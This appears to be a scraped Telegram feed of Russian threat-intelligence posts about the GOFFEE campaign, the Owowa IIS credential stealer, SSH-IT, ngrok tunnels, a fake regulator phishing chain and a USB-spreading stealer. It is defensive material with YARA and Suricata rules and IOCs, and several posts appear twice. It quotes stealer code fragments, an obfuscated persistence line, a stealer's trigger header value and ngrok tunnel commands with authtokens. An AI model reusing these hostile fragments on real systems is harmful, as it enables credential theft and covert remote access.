Gapucino* — это GOFFEE ☕️
Сегодня мы расскажем про одну из самых активных на данный момент кампаний на территории России. Другие исследователи называют ее GOFFEE.
В качестве исходного вектора злоумышленники используют фишинговые письма с документами, которые содержат вредоносный макрос. Пример такого документа мы разобрали в посте !!р^д**н**c 🤔
Аналогичные документы можно обнаружить по паттерну:
Кроме того, эксперты из Cisco Talos буквально на днях описали аналогичную цепочку атак на российские компании.
После проникновения в инфраструктуру атакующие используют Mythic-агент QwakMyAgent, написанный на языке PowerShell, о котором рассказали специалисты F.A.C.C.T.
Одним из самых интересных инструментов, который применяется атакующими в ходе этой кампании, является IIS-модуль
*
#dfir #detect #C2 #TI
@ptescalator
Сегодня мы расскажем про одну из самых активных на данный момент кампаний на территории России. Другие исследователи называют ее GOFFEE.
В качестве исходного вектора злоумышленники используют фишинговые письма с документами, которые содержат вредоносный макрос. Пример такого документа мы разобрали в посте !!р^д**н**c 🤔
Аналогичные документы можно обнаружить по паттерну:
content:"DigitalRSASignature"
Кроме того, эксперты из Cisco Talos буквально на днях описали аналогичную цепочку атак на российские компании.
После проникновения в инфраструктуру атакующие используют Mythic-агент QwakMyAgent, написанный на языке PowerShell, о котором рассказали специалисты F.A.C.C.T.
Одним из самых интересных инструментов, который применяется атакующими в ходе этой кампании, является IIS-модуль
Owowa (о нем — в следующем посте). *
Gapucino.com — один из C2 злоумышленников.#dfir #detect #C2 #TI
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Про вредоносный IIS-модуль Owowa, предназначенный для перехвата учетных записей пользователей, исследователи рассказывали еще в 2021 году.
А в 2022 году мы рассказывали про его эволюцию на OFFZONE. Как показывает практика, используя этот IIS-модуль, атакующие за достаточно короткий временной промежуток могут скомпрометировать большое количество учетных записей и получить пароли пользователей в открытом виде.
Модуль устанавливается в системе командой
appcmd.exe install module. Во всех проанализированных нами образцах базовый класс, который реализует интерфейс IHttpModule, называется ExtenderControlDesigner. После запуска модуль методом PreSendRequestContent перехватывает входящие запросы.
public class ExtenderControlDesigner : IHttpModule
{
public void Init(HttpApplication context)
{
context.PreSendRequestContent += this.PreSend_RequestContent;
}
private void PreSend_RequestContent(object sender, EventArgs e)
{...
Злоумышленники продолжают использовать этот достаточно простой IIS-модуль в своих самых громких атаках на российские компании и в 2024 году. Так, расследуя один из инцидентов ИБ, команда PT ESC обнаружила модификацию стилера Owowa. В обновленной версии атакующие отказались от записи скомпрометированных учетных данных в журнал в файловой системе. Вместо этого они хранятся в HashSet в оперативной памяти.
Пример учетных данных, которые записываются в HashSet:
ExtenderControlDesigner.Data item = new ExtenderControlDesigner.Data
{
Id = text,
UserName = userName,
Password = pass,
UserHostAddress = userHostAddress,
XForwardedFor = xForwardedFor,
DateTimeUtc = dateTimeUtc
};
bool flag2 = !ExtenderControlDesigner.hashSetData.Contains(item);
if (flag2)
{
ExtenderControlDesigner.hashSetData.Add(item);
}
Данные, как и раньше, защищены алгоритмом
RSA-2048, а публичный ключ захардкожен в модуле. Для получения информации о количестве уникальных записей можно произвести поиск сигнатуры 42 5A 68 00, она является разделителем учетных записей.
memoryStream.Write(new byte[]
{
66,
90,
104,
0
}, 0, 4);
Так как публичный ключ модуля, использовавшегося в атаках на компании в России, всегда идентичен и не менялся с 2022 года, мы можем предположить, что за всеми атаками с его применением стоит одна группа злоумышленников.
Зашифрованный список учетных записей злоумышленники получают отправив корректный GET-запрос с заголовком
username: ZaDS0tojX0VDh82.Пример GET-запроса в журналах IIS-сервера:
2024-07-29 14:32:21 127.0.0.1 GET /owa/ 443 ZaDS0tojX0VDh82 127.0.0.2 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 401 1 1527 14
Помимо перехвата полей
username, password в новой версии были добавлены перехваты LOGON_USER, AUTH_PASSWORD.В последней версии злоумышленники отказались от функции
RunCommand, которая выполняла команды на скомпрометированном узле через powershell.exe.IoCs:
Name MD5
ClassLibrary2.dll af6507e03e032294822e4157134c9909
ClassLibrary3.dll 2d240b6ceeaacd2e3dd52c9e7d3fb622
ClassLibrary3.dll 5cc433a2550bb7389f6c90521e7afa25
ExtenderControlDesigner.dll 967e7b6b048d628f36bbb4ca7b0f483f
ClassLibrary3.dll e657eea3b9b7317e28ab4a89c1fa2177
ClassLibrary3.dll 6e6218aac341463496cca32f52b29013
ClassLibrary3.dll 4d66a3bbaf65a2ec36fd2d143c872ef6
YARA:
rule Owowa {
strings:
$s1 = "IHttpModule"
$s2 = "PreSend_RequestContent"
$s3 = "ExtenderControlDesigner"
$u1 = "283c00ecp774ag36boljbpp6" wide
$u2 = "dEUM3jZXaDiob8BrqSy2PQO1" wide
$u3 = "Fb8v91c6tHiKsWzrulCeqO" wide
$u4 = "jFuLIXpzRdateYHoVwMlfc" wide
$u5 = "oACgTsBMliysfk" wide
$u6 = "uW4sSY1CAkN6kI6r6ByXUWnK" wide
$u7 = "ZaDS0tojX0VDh82" wide
$u8 = "zwa879pOX1NAmTom8m3aQvoZ" wide
condition:
uint16be ( 0 ) == 0x4d5a and ( 2 of ( $s* ) ) and ( 2 of ( $u* ) ) and filesize < 20KB
}
Happy hunting!
#hunt #IOC #yara #dfir #detect #win
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
В начале июня 2024 года специалисты департамента Threat Intelligence выявили новую цепочку атаки PhaseShifters.
✍️ PhaseShifters (Sticky Werewolf, UAC-0050
В своих атаках группировка использует фишинг: злоумышленники отправляют письма якобы от официальных лиц с просьбой ознакомиться с документом и подписать его. Документ находится во вложении внутри защищенного паролем архива. В качестве ВПО злоумышленники используют Rhadamanthys, DarkTrack RAT, Meta Stealer и другие.
На данный момент мы склоняемся к тому, что UAC-0050 и PhaseShifters — это одна и та же группировка, но убедиться в этом можно будет только после более длительного наблюдения.
Летом этого года обе группировки начали использовать идентичные паттерны в своих атаках. Дошло даже до того, что ВПО группировок располагалось в одном и том же репозитории BitBucket. Это заставило нас углубиться в эту тему.
#TI #Hunt #Malware #APT
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
В какой папке обычно живут хакеры в Windows? 💻
Anonymous Poll
7%
c:\windows\system32\tasks
30%
c:\users\<username>\appdata\local\temp
8%
c:\programdata
4%
d:\malware_samples_DO_NOT_DELETE
15%
c:\windows\system32
1%
c:\users\<username>\desktop
17%
c:\windows\temp
10%
Посмотрю завтра, все равно рабочий день 💡
2%
c:\users\public
5%
c:\users\<username>\downloads
SSH-IT. Инструкция по обнаружению популярного инструмента 🔭
В процессе расследования множества инцидентов, связанных с компрометацией Linux-узлов, мы иногда обнаруживаем на них различные хакерские инструменты.
Сегодня поговорим об SSH-IT. Хакеры часто используют его для перехвата SSH-сессий и получения вводимых пользователем команд.
Для обнаружения признаков установки инструмента на узлах ищите:
1. Файлы по паттерну:
🧐 Пример:
2. Файлы, через которые может осуществляться закрепление в системе и в которых встречаются строки по паттерну:
👀 Пример (файл
📃 Рекомендации по дальнейшим действиям:
1️⃣ Заблокировать адреса управляющих серверов;
2️⃣ Удалить файлы, относящиеся к SSH-IT, а также изменить файлы, через которые SSH-IT закрепился в системе;
3️⃣ Перезагрузить скомпрометированный хост;
4️⃣ Осуществить поиск подозрительных входов по сети и проверку логов веб-сервера (если он есть и торчит наружу).
#tip #detect #hacktool #dfir
@ptescalator
В процессе расследования множества инцидентов, связанных с компрометацией Linux-узлов, мы иногда обнаруживаем на них различные хакерские инструменты.
Сегодня поговорим об SSH-IT. Хакеры часто используют его для перехвата SSH-сессий и получения вводимых пользователем команд.
Для обнаружения признаков установки инструмента на узлах ищите:
1. Файлы по паттерну:
'/prng/((askpass|hook|x|ssh_login)\.sh|depth\.cfg|funcs|ptyspy_bin\.[a-z_0-9]+\-(linux|alpine|osx)|seed|ssh|thc_cli)':
find / -type f | egrep -a '/prng/((askpass|hook|x|ssh_login)\.sh|depth\.cfg|funcs|ptyspy_bin\.[a-z_0-9]+\-(linux|alpine|osx)|seed|ssh|thc_cli)'
🧐 Пример:
/home/john/.config/prng/askpass.sh
/home/john/.config/prng/depth.cfg
/home/john/.config/prng/funcs
/home/john/.config/prng/hook.sh
/home/john/.config/prng/ptyspy_bin.aarch64-linux
/home/john/.config/prng/ptyspy_bin.armv6l-linux
/home/john/.config/prng/ptyspy_bin.i386-alpine
/home/john/.config/prng/ptyspy_bin.mips32-alpine
/home/john/.config/prng/ptyspy_bin.mips64-alpine
/home/john/.config/prng/ptyspy_bin.x86_64-alpine
/home/john/.config/prng/ptyspy_bin.x86_64-osx
/home/john/.config/prng/seed
/home/john/.config/prng/ssh
/home/john/.config/prng/ssh_login.sh
/home/john/.config/prng/thc_cli
/home/john/.config/prng/x.sh
2. Файлы, через которые может осуществляться закрепление в системе и в которых встречаются строки по паттерну:
'# DO NOT REMOVE THIS LINE\. SEED PRNGD|source.+2\>/dev/null #PRNGD'
egrep -aor '# DO NOT REMOVE THIS LINE\. SEED PRNGD|source.+2\>/dev/null #PRNGD' /
👀 Пример (файл
/home/john/.profile):
"# ~/.profile: executed by the command interpreter for login shells.
# DO NOT REMOVE THIS LINE. SEED PRNGD.
source "$(echo 2f686f6d652f6a6f686e2f2e636f6e6669672f70726e672f736565640a|/usr/bin/xxd -r -ps 2>/dev/null)" 2>/dev/null #PRNGD
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.
# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022
# if running bash
if [ -n ""$BASH_VERSION"" ]; then
# include .bashrc if it exists
if [ -f ""$HOME/.bashrc"" ]; then
. ""$HOME/.bashrc""
fi
fi
# set PATH so it includes user's private bin if it exists
if [ -d ""$HOME/bin"" ] ; then
PATH=""$HOME/bin:$PATH""
fi
# set PATH so it includes user's private bin if it exists
if [ -d ""$HOME/.local/bin"" ] ; then
PATH=""$HOME/.local/bin:$PATH""
fi"
📃 Рекомендации по дальнейшим действиям:
1️⃣ Заблокировать адреса управляющих серверов;
2️⃣ Удалить файлы, относящиеся к SSH-IT, а также изменить файлы, через которые SSH-IT закрепился в системе;
3️⃣ Перезагрузить скомпрометированный хост;
4️⃣ Осуществить поиск подозрительных входов по сети и проверку логов веб-сервера (если он есть и торчит наружу).
#tip #detect #hacktool #dfir
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
PT ESC на SOC FORUM 2024 👀
На юбилейном, десятом, #socforum специалисты нашего экспертного центра безопасности представят семь презентаций по различным направлениям.
Выбирайте, какие вам по душе, и приходите послушать (или смотрите онлайн)!
🗓 7 ноября
14:35–15:00 | Зал 2
«Осмысленная открытость: как мы разрабатываем open-source-проекты в сфере ИБ и зачем создали комитет по открытому коду внутри компании»
Кутепов Антон — руководитель направления развития инициатив ИБ-сообществ
Попов Александр — главный исследователь безопасности операционных систем
▶️ ▶️ ▶️
15:00–15:30 | Зал 3
«Кто автор? Как работает автоматизированный модуль атрибуции вредоносного ПО»
Медведев Сергей — руководитель группы углубленного исследования угроз экспертного центра безопасности PT ESC
▶️ ▶️ ▶️
16:30–17:00 | Зал 3
«Stratocaster: как мы автоматизировали рутинный поиск неизвестного ВПО в сетевом трафике»
Бечкало Евгений — руководитель отдела сетевой экспертизы антивирусной лаборатории ESC
Наумова Ксения — специалист отдела сетевой экспертизы антивирусной лаборатории ESC
▶️ ▶️ ▶️
18:00–18:30 | Зал 3
«Неочевидное, но опасное: как мы научились ловить редкие буткиты с помощью динамического анализа в виртуальных машинах»
Максютин Павел — ведущий специалист отдела экспертизы PT Sandbox
🗓 8 ноября
12:40–13:20 | Зал 4
«Результаты расследований инцидентов ИБ за 2024 год»
Гойденко Денис — руководитель отдела расследования и реагирования на инциденты ИБ
▶️ ▶️ ▶️
14:40–15:20 | Зал 5
«Змеиный улов: обзор интересных троянов, опубликованных в Python Package Index за 2024 год»
Раковский Станислав — руководитель группы Supply Chain Security
▶️ ▶️ ▶️
16:00–16:40 | Зал 4
«Livehunt своими руками: какие технологии нужны, чтобы автоматизировать процесс обработки миллиона файлов»
Похлебин Максим — ведущий специалист отдела разработки департамента Threat Intelligence
Андреев Максим — руководитель отдела исследования сложных угроз департамента Threat Intelligence
@ptescalator
На юбилейном, десятом, #socforum специалисты нашего экспертного центра безопасности представят семь презентаций по различным направлениям.
Выбирайте, какие вам по душе, и приходите послушать (или смотрите онлайн)!
🗓 7 ноября
14:35–15:00 | Зал 2
«Осмысленная открытость: как мы разрабатываем open-source-проекты в сфере ИБ и зачем создали комитет по открытому коду внутри компании»
Кутепов Антон — руководитель направления развития инициатив ИБ-сообществ
Попов Александр — главный исследователь безопасности операционных систем
15:00–15:30 | Зал 3
«Кто автор? Как работает автоматизированный модуль атрибуции вредоносного ПО»
Медведев Сергей — руководитель группы углубленного исследования угроз экспертного центра безопасности PT ESC
16:30–17:00 | Зал 3
«Stratocaster: как мы автоматизировали рутинный поиск неизвестного ВПО в сетевом трафике»
Бечкало Евгений — руководитель отдела сетевой экспертизы антивирусной лаборатории ESC
Наумова Ксения — специалист отдела сетевой экспертизы антивирусной лаборатории ESC
18:00–18:30 | Зал 3
«Неочевидное, но опасное: как мы научились ловить редкие буткиты с помощью динамического анализа в виртуальных машинах»
Максютин Павел — ведущий специалист отдела экспертизы PT Sandbox
🗓 8 ноября
12:40–13:20 | Зал 4
«Результаты расследований инцидентов ИБ за 2024 год»
Гойденко Денис — руководитель отдела расследования и реагирования на инциденты ИБ
14:40–15:20 | Зал 5
«Змеиный улов: обзор интересных троянов, опубликованных в Python Package Index за 2024 год»
Раковский Станислав — руководитель группы Supply Chain Security
16:00–16:40 | Зал 4
«Livehunt своими руками: какие технологии нужны, чтобы автоматизировать процесс обработки миллиона файлов»
Похлебин Максим — ведущий специалист отдела разработки департамента Threat Intelligence
Андреев Максим — руководитель отдела исследования сложных угроз департамента Threat Intelligence
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Учимся восстанавливать импорты VMProtect ⚙️
VMProtect — один из самых используемых протекторов ВПО. При этом зачастую злоумышленники ленятся и используют лишь простые опции защиты — обфускацию точки входа и импортов.
Ранее мы уже научились настраивать виртуальную среду для отладки ВПО, а также познакомились с эмулятором Speakeasy. Воспользуемся этими знаниями, чтобы попытаться восстановить импорты VMP.
Сдампим процесс (важно, чтобы в нем на момент дампа была достигнута OEP, тогда VMP инициализирует все внутренние структуры для работы), откроем дамп в IDA и позволим ей разметить символы библиотек.
Далее посмотрим, как выглядят обфусцированные импорты (скриншот 1). Видно, что VMP вставил вызов на свою секцию вместо вызова оригинальной библиотеки, а вызываемая функция состоит из кучи (на первый взгляд) мусорных инструкций.
❗️ Однако это не совсем так. Если провалиться в этот вызов в отладчике, то в какой-то момент на стеке окажется настоящий адрес API. Пример трассировки смотрите на скриншоте 2.
Попробуем это автоматизировать. Для начала необходимо собрать интересующий нас список вызовов. Логика простая: вызов идет из текстовой секции в секцию VMP (скриншот 3). Для краткости будем считать, что адреса этих секций в дампе нам уже известны.
Напишем логику для разрешения полученных адресов, для этого загрузим модуль из дампа как шеллкод в Speakeasy и добавим хук с проверкой каждой инструкции на
Функция запуска эмулятора представлена на скриншоте 5. Он выполняется несколько раз, чтобы обойти ситуацию, когда после выполнения нескольких мусорных инструкций повреждается его внутреннее состояние и попытки прочитать что-то после всегда завершаются ошибками.
Теперь объединим все вместе и посмотрим на результаты (скриншот 6). Опираясь на собранную информацию, можно разметить большую часть импортов в исходном образце.
👀 Итого: мы научились минимальными усилиями восстанавливать импорты VMP, что значительно упрощает анализ таких образцов. При желании можно применить аналогичный подход для запущенных процессов, а также пропатчить и пересобрать образец с правильными адресами API, как это делает, например, vmpdump.
#ti #malware #tip #VMProtect
@ptescalator
VMProtect — один из самых используемых протекторов ВПО. При этом зачастую злоумышленники ленятся и используют лишь простые опции защиты — обфускацию точки входа и импортов.
Ранее мы уже научились настраивать виртуальную среду для отладки ВПО, а также познакомились с эмулятором Speakeasy. Воспользуемся этими знаниями, чтобы попытаться восстановить импорты VMP.
Сдампим процесс (важно, чтобы в нем на момент дампа была достигнута OEP, тогда VMP инициализирует все внутренние структуры для работы), откроем дамп в IDA и позволим ей разметить символы библиотек.
Далее посмотрим, как выглядят обфусцированные импорты (скриншот 1). Видно, что VMP вставил вызов на свою секцию вместо вызова оригинальной библиотеки, а вызываемая функция состоит из кучи (на первый взгляд) мусорных инструкций.
Попробуем это автоматизировать. Для начала необходимо собрать интересующий нас список вызовов. Логика простая: вызов идет из текстовой секции в секцию VMP (скриншот 3). Для краткости будем считать, что адреса этих секций в дампе нам уже известны.
Напишем логику для разрешения полученных адресов, для этого загрузим модуль из дампа как шеллкод в Speakeasy и добавим хук с проверкой каждой инструкции на
ret. Дополнительно ограничим максимальную глубину трассировки и будем сохранять количество шагов для каждого импорта. Итоговое содержимое хука, а также функцию инициализации шеллкода в эмуляторе можно увидеть на скриншоте 4.Функция запуска эмулятора представлена на скриншоте 5. Он выполняется несколько раз, чтобы обойти ситуацию, когда после выполнения нескольких мусорных инструкций повреждается его внутреннее состояние и попытки прочитать что-то после всегда завершаются ошибками.
Теперь объединим все вместе и посмотрим на результаты (скриншот 6). Опираясь на собранную информацию, можно разметить большую часть импортов в исходном образце.
#ti #malware #tip #VMProtect
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Повторите, плохо видно 😳
Недавно группа киберразведки PT ESC обнаружила пример многоступенчатой фишинговой атаки, в которой хакеры сначала пытались завоевать доверие жертвы, а затем заставить запустить полезную нагрузку.
Следите за руками👐
1️⃣ В конце октября нам попалось письмо, отправленное от имени управления ФСТЭК по СЗФО (скриншот 1).
Во вложении находился скан информационного письма ФСТЭК «О продлении срока действия уровня опасности». Вредоносного содержимого и каких-либо ссылок в нем не было, сам PDF-файл не являлся опасным. А вот качество скана документа оставляло желать лучшего и для визуального ознакомления с требованиями точно не подходило (скриншот 2).
Для отправки письма использовался домен
2️⃣ Отложив находку с
Этот исполняемый файл запускает сервер
Скорее всего, злоумышленники используют многоступенчатую технику социальной инженерии: сначала присылают безопасный и трудночитаемый документ, побуждая жертву завязать с ними диалог. А получив кредит доверия, отправляют ей полезную нагрузку.
🤔 Тактики, техники и процедуры этой атаки схожи с теми, что использует группировка PseudoGamaredon (Core Werewolf), но подтверждение требует дальнейших наблюдений.
IOCs
#TI #phishing #ioc
@ptescalator
Недавно группа киберразведки PT ESC обнаружила пример многоступенчатой фишинговой атаки, в которой хакеры сначала пытались завоевать доверие жертвы, а затем заставить запустить полезную нагрузку.
Следите за руками
1️⃣ В конце октября нам попалось письмо, отправленное от имени управления ФСТЭК по СЗФО (скриншот 1).
Во вложении находился скан информационного письма ФСТЭК «О продлении срока действия уровня опасности». Вредоносного содержимого и каких-либо ссылок в нем не было, сам PDF-файл не являлся опасным. А вот качество скана документа оставляло желать лучшего и для визуального ознакомления с требованиями точно не подходило (скриншот 2).
Для отправки письма использовался домен
fstec.info, который не является официальным доменом ФСТЭК и зарегистрирован 16 октября 2024 года.2️⃣ Отложив находку с
fstec.info в бэклог для тщательного анализа, через несколько дней мы обнаружили более качественный скан того же документа (скриншот 3), который при ближайшем рассмотрении оказался исполняемым файлом с иконкой PDF.Этот исполняемый файл запускает сервер
UltraVNC с коннектом к узлу toproducts.ru:80, в результате чего создается сессия удаленного управления, к которой может подключится злоумышленник. А для отвлечения внимания запускается тот самый легитимный документ, но уже в улучшенном качестве (скриншот 3).Скорее всего, злоумышленники используют многоступенчатую технику социальной инженерии: сначала присылают безопасный и трудночитаемый документ, побуждая жертву завязать с ними диалог. А получив кредит доверия, отправляют ей полезную нагрузку.
🤔 Тактики, техники и процедуры этой атаки схожи с теми, что использует группировка PseudoGamaredon (Core Werewolf), но подтверждение требует дальнейших наблюдений.
IOCs
Sender:
[email protected]
Scan.pdf
3b6010acae660c9455154b9b847c5b12
0f37bf48736fa806112d0413f42840bbdb75e378
d4878ba0cad42eb7ec012b9f71faa49e0ef2ac48665dbaaec627b603639fc2e7
исх 1-2090 от 15-10-2024_О продлении.exe
e77ab4faa8632a184a1d9e6ea9e6459d
65a538ee9f0e59495281661ee4c68dd08f339d5f
66a3a8cab5d3a88fb1e854f69178b9468cfa4ec49d1b6ba3d4f6d190e57c85a5
Domains:
toproducts.ru:80
fstec.info
#TI #phishing #ioc
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Сколько дней вы пили на этой неделе? 😧
Anonymous Poll
14%
Только начал ✌️
16%
Весь SOC FORUM 🍺
4%
2/2 🕺
6%
5/7 🤗
9%
Восемь 🆘
3%
rotalaCSE 🤟
19%
Смотрю в SIEM, не травите душу 😢
29%
Бросил, больше не могу 🤷♂️
Ngrok. Находим и разбираемся 🔍
В процессе расследования множества инцидентов мы неоднократно встречаем такой инструмент, как ngrok. Это удобный легитимный инструмент для прокидывания сетевых туннелей для администраторов.
Он стал очень популярен у злоумышленников, которые, как правило, устанавливают RDP-соединения, и мы настоятельно рекомендуем поискать ngrok у себя в инфраструктуре.
Несколько рекомендаций по поиску признаков использования ngrok на узлах:
1️⃣ Наличие файла с именем ngrok.yml или директорий
2️⃣ Наличие файла
Пример (
3️⃣ Наличие строки
4️⃣ Наличие файла планировщика заданий Windows, через который осуществляется закрепление на узле и в котором могут встречаться строки по следующим паттернам:
Пример 1 (
Пример 2 (
📌 Чтобы обнаружить признаки наличия инструмента на периметре, можно поискать узлы, взаимодействующие со следующими серверами:
#tip #detect #hacktool #dfir
@ptescalator
В процессе расследования множества инцидентов мы неоднократно встречаем такой инструмент, как ngrok. Это удобный легитимный инструмент для прокидывания сетевых туннелей для администраторов.
Он стал очень популярен у злоумышленников, которые, как правило, устанавливают RDP-соединения, и мы настоятельно рекомендуем поискать ngrok у себя в инфраструктуре.
Несколько рекомендаций по поиску признаков использования ngrok на узлах:
1️⃣ Наличие файла с именем ngrok.yml или директорий
ngrok, .ngrok2, которые, как правило, имеют следующие файловые пути:
C:\Users\<username>\.ngrok2\ngrok.yml
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\ngrok\ngrok.yml
C:\Windows\SysWOW64\config\systemprofile\.ngrok2\ngrok.yml
2️⃣ Наличие файла
*.yml, в котором встречаются строки по следующим паттернам:
'version\: \"[0-9]+\"'
'authtoken\: [a-z0-9_]{49}'
Пример (
ngrok.yml):
version: "2"
authtoken: 5U87lkcqEFeZ0sJ7Hg66aXkkrO4_K9EpjQHkJMkTg0R96pu64
3️⃣ Наличие строки
::%16777216 в качестве адреса сети источника в журналах сетевых подключений:
C:\Windows\System32\winevt\logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx
C:\Windows\System32\winevt\logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx
4️⃣ Наличие файла планировщика заданий Windows, через который осуществляется закрепление на узле и в котором могут встречаться строки по следующим паттернам:
'<Arguments>tcp [0-9]+</Arguments>'
'<Arguments>tcp [^ ]+\:[0-9]+ \-\-authtoken [a-z0-9_]{49}</Arguments>'
Пример 1 (
C:\Windows\System32\Tasks\Microsoft\Windows\Microsoft\Monitor):
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
...
<Actions Context="Author">
<Exec>
<Command>C:\Windows\System32\Microsoft\1.exe</Command>
<Arguments>tcp 3389</Arguments>
</Exec>
</Actions>
</Task>
Пример 2 (
C:\Windows\System32\Tasks\updater):
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
...
<Actions Context="Author">
<Exec>
<Command>C:\ProgramData\1.exe</Command>
<Arguments>tcp poc.opi.rtyo.ru:22 --authtoken qr7pKMAgTp5nfT0HTwh21sb9VsF_FwX3xkNuQqJE7MBh0gUj8</Arguments>
<WorkingDirectory>C:\ProgramData</WorkingDirectory>
</Exec>
</Actions>
</Task>
📌 Чтобы обнаружить признаки наличия инструмента на периметре, можно поискать узлы, взаимодействующие со следующими серверами:
ngrok.com
ngrok-agent.com
ngrok.io
*.equinox.io
#tip #detect #hacktool #dfir
@ptescalator
Стилерная инфекция: новый USB-штамм 👾
Сегодня расскажем про обнаруженную нами необычную модификацию стилера WorldWind. Это самый что ни на есть настоящий вирус, передающийся через тесный контакт зараженного устройства с USB-носителем и вызывающий не только утечку конфиденциальной информации, но и потерю бесценной коллекции ПО на внешних дисках.
Находка, как и ее предшественники, все также продолжает использовать сервисы
🐔 Мутации же затронули сетевую часть и набор функций стилера. Теперь он не передает информацию через Telegram. Вместо этого сообщения улетают на С2-сервер злоумышленников в следующем порядке: checkin → exfiltration → close. Форматы этих сообщений представлены на скриншоте 2.
Из стилера также пропали функции для кражи VPN-конфигов и паролей от игровых лончеров и Wi-Fi. Но взамен развилась способность агрессивно распространяться через USB-носители. Если на внешнем диске есть экзешники, то стилер удалит их и запишет себя под их именами (скриншот 3).
Не находите, что повеяло старыми добрыми временами дикого вирусописательства?😏
Чтобы уменьшить риск заражения, ставьте сигнатурные прививки и проходите антивирусные осмотры.
Заодно давайте покроем стилер правилом, детектирующим checkin:
IOCs:
Будьте здоровы и happy hunting!
#hunt #C2 #detect #ioc #malware #network #suricata
@ptescalator
Сегодня расскажем про обнаруженную нами необычную модификацию стилера WorldWind. Это самый что ни на есть настоящий вирус, передающийся через тесный контакт зараженного устройства с USB-носителем и вызывающий не только утечку конфиденциальной информации, но и потерю бесценной коллекции ПО на внешних дисках.
Находка, как и ее предшественники, все также продолжает использовать сервисы
icanhazip, mylnikov.org + Google Карты для определения внешнего IP-адреса и геолокации (скриншот 1). Реализация модуля сбора информации тоже не изменилась, за исключением пары структур.Из стилера также пропали функции для кражи VPN-конфигов и паролей от игровых лончеров и Wi-Fi. Но взамен развилась способность агрессивно распространяться через USB-носители. Если на внешнем диске есть экзешники, то стилер удалит их и запишет себя под их именами (скриншот 3).
Не находите, что повеяло старыми добрыми временами дикого вирусописательства?
Чтобы уменьшить риск заражения, ставьте сигнатурные прививки и проходите антивирусные осмотры.
Заодно давайте покроем стилер правилом, детектирующим checkin:
alert tcp any any -> any any (msg: "STEALER [PTsecurity] WorldWind checkin"; flow: established, to_server; stream_size: client, <, 80; stream_size: server, =, 1; content: "|46 00 00 00|"; startswith; fast_pattern; content: "{|22|id|22 3a| 0"; within: 8; content: "|22|hwid|22 3a|"; within: 10; content: !"|20|"; distance: 2; within: 32; content: "|22|country|22 3a|"; distance: 32; content: !","; distance: 0; classtype: trojan-activity; metadata: malware_family WorldWind; sid: 1; rev: 1;)
IOCs:
84d52de2b69e14f26259da07297e02eb2c4ac32045a690f65a267fe931da0433
20.208.136.72:12346
Будьте здоровы и happy hunting!
#hunt #C2 #detect #ioc #malware #network #suricata
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM